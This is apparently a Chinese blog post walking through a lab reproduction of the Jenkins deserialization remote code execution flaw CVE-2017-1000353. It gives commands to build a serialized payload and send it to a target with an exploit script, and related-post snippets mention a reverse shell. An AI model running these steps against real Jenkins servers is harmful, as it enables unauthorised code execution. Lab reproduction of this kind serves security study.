Jenkins-CI 远程代码执行漏洞(CVE-2017-1000353)

最新推荐文章于 2024-07-16 20:41:04 发布
最新推荐文章于 2024-07-16 20:41:04 发布
阅读量207 收藏
点赞数
分类专栏: vulhub漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/EC_Carrot/article/details/118485250
版权

漏洞复现

先下载CVE-2017-1000353-1.1-SNAPSHOT-all.jar
执行下面命令,生成字节码文件:

java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"

下载exploit.py,python3执行python exploit.py http://your-ip:8080 jenkins_poc.ser,将刚才生成的字节码文件发送给目标
在这里插入图片描述
返回查看容器
在这里插入图片描述

小 白 萝 卜
关注
专栏目录
ansible-role-jenkins:Ansible角色-Jenkins CI
01-30
【Ansible角色-Jenkins CI详解】 Ansible是一个强大的自动化工具,用于配置管理、应用部署和任务执行。在持续集成(CI)和持续交付(CD)的流程中,Jenkins是广泛应用的开源自动化服务器。`ansible-role-jenkins`是...
Jenkins CVE-2017-1000353远程代码执行漏洞复现
云舒的博客
09-09 1018
Jenkins CVE-2017-1000353远程代码执行漏洞复现
CVE-2017-1000353 Jenkins 漏洞复现
最新发布
weixin_60864619的博客
07-16 403
进入容器docker exec -it cve-2017-1000353_jenkins_1 bash。复现Vulhub/jenkins / CVE-2017-1000353漏洞。3)通过工具exploit.py发送数据包执行命令;监听端口8888,执行命令,反弹shell成功;2)利用工具生成字节码文件;
jenkins漏洞复现】CVE-2017-1000353远程代码执行漏洞+CVE-2018-1000861未授权弱口令用户可执行任意命令
serendipity1130的博客
08-31 972
CVE-2017-1000353 1.扫描开放了8080端口,访问8080端口: 2、执行下面命令,生成字节码文件: java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success" 3、执行上述代码后,生成jenkins_poc.ser文件,这就是序列化字符串,#"touch..."是待执行的任意命令 4、修改exploit.py,把proxies里面的内容注释掉 6、执行如下
jenkins 反序列化漏洞 cve-2017-1000353
whatday的专栏
06-13 1473
一、漏洞原理: 首先这是一个java反序列化漏洞,一定是command在序列化信息中,反序列化时候直接执行了该命令。 攻击过程学习: 下文的session是一个uuid,类型4 # 可以如下生成 session = uuid.uuid4() 1、首先要发送一个请求,是一个下载请求。这个请求是要启动一个双向数据传输频道。频道的标识就是session。而side字段则是用来标识传输方向 对应代码段: def Download(url,session): headers = {'Si
jenkins-pipeline-library:用于Fedora CIJenkins管道库
04-10
Fedora CI管道库该git存储库包含可重用的步骤和函数库,可在Jenkinsfile中使用这些步骤和函数来简化Fedora CI管道。如何使用这个库该库旨在用作在您的Jenkins实例中配置的。 建议固定库的特定版本并谨慎更新。 要...
jenkins-build-monitor-plugin:Jenkins CI Build Monitor插件
01-30
Jenkins CI Build Monitor插件 Build Monitor插件提供了所选Jenkins作业状态的高度可见的视图。 它可以轻松适应不同的计算机屏幕尺寸,并且非常适合作为极端反馈设备显示在办公室墙壁的屏幕上。 (灵感来自不再维护...
android-gradle-jenkins-plugin:Jenkins上用于CI Android项目的Gradle插件
01-30
Android Gradle Jenkins 插件的核心功能是将Gradle构建系统与JenkinsCI服务紧密集成。Gradle作为Google推荐的Android项目构建工具,拥有强大的灵活性和可扩展性,可以处理复杂的依赖关系和构建逻辑。而Jenkins则是...
Jenkins-CI 远程代码执行漏洞CVE-2017-1000353)复现
thelostworld
03-24 194
项目中遇到Jenkins-CI 远程代码执行漏洞相关漏洞,本地尝试漏洞复现,目前已知可以在/tmp下面创建文件,但是没有内容,基于这个环境尝试其他的方式。环境搭建https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2017-1000353执行如下命令启动jenkins 2.46.1:docker-compose up -dhttp://...
Jenkins RCE 漏洞复现(CVE-2017-1000353CVE-2018-1000861)
oiadkt的博客
09-21 2038
Jenkins 是软件测试过程中常用的一种持续构建的工具,Jenkins RCE 漏洞触发方式大致分为两种,一种使用 Jenkins CLI 触发,而另一种触发方式为 HTTP 请求触发。这里复现的 CVE-2017-1000353CVE-2018-1000861 就是两种触发方式的代表。
Jenkins 远程代码执行漏洞CVE-2017-1000353) 复现
YouthBelief的博客
11-25 5118
所有文章,仅供安全研究与学习之用,后果自负! Jenkins 远程代码执行漏洞CVE-2017-1000353Jenkins 远程代码执行漏洞CVE-2017-1000353)0x01 漏洞描述0x02 影响范围0x03 漏洞复现0x04 漏洞修复 Jenkins 远程代码执行漏洞CVE-2017-1000353) 0x01 漏洞描述 Jenkins 可以通过其网页界面轻松设置和配置,其中包括即时错误检查和内置帮助。 插件 通过更新中心中的 1000 多个插件,Jenkins 集成了持续集成和持续交
Jenkins-CI远程代码执行漏洞复现(CVE-2017-1000353)
baidu_38844729的博客
06-19 1321
漏洞分析 漏洞描述: Jenkins存在未经身份验证的远程代码执行漏洞,经过序列化的Java SignedObject对象传输到基于远程处理的Jenkins CLI,在使用新的对象ObjectInputStream对其进行反序列化操作即可绕过现有的基于黑名单的保护机制。远程攻击者可利用漏洞在受影响的应用程序的上下文中执行任意代码,或造成程序拒绝服务。 影响版本: Jenkins <= 2.56 Jenkins LTS <= 2.46.1 漏洞复现 使用vulhub复现 一、启动jenkins 2
jenkins 代码执行 (CVE-2017-1000353)漏洞复现
XXokok的博客
11-28 343
**描述: ​**Jenkins 可以通过其网页界面轻松设置和配置,其中包括即时错误检查和内置帮助。 插件 通过更新中心中的 1000 多个插件,Jenkins 集成了持续集成和持续交付工具链中几乎所有的工具。 Jenkins的反序列化漏洞,攻击者使用该漏洞可以在被攻击服务器执行任意代码漏洞利用不需要任何的权限
Jenkins反序列化漏洞cve-2017-1000353
weixin_30593443的博客
12-13 433
一、漏洞原理: 本地没有环境:参考:https://blogs.securiteam.com/index.php/archives/3171 进行学习理解记录。 首先这是一个java反序列化漏洞,一定是command在序列化信息中,反序列化时候直接执行了该命令。 攻击过程学习: 下文的session是一个uuid,类型4 1 #可以如下生成 2 session = uuid....
代码层面分析Jenkins未授权访问CVE-2017-1000353
stopys6的博客
09-13 240
/通过上面的ReaderThread.start()方法启动一个线程,ReaderThread为SynchronousCommandTransport类的内部类,在run()方法中,调用ClassicCommandTransport类的read()方法读取输入,read()方法实际是调用Command类的readFrom()方法读取,通过反序列化输入返回一个Command对象。在 run() 方法中,使用一个循环来读取通道中的命令,直到通道被关闭为止。
Jenkins Git client插件CVE-2019-10392:命令执行漏洞分析
Jenkins Git client插件命令执行漏洞(CVE-2019-10392) Jenkins Git client插件是一个广泛使用的工具,它允许Jenkins与Git版本控制系统进行交互,以便在持续集成和持续部署流程中自动获取代码仓库的更新。然而,在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值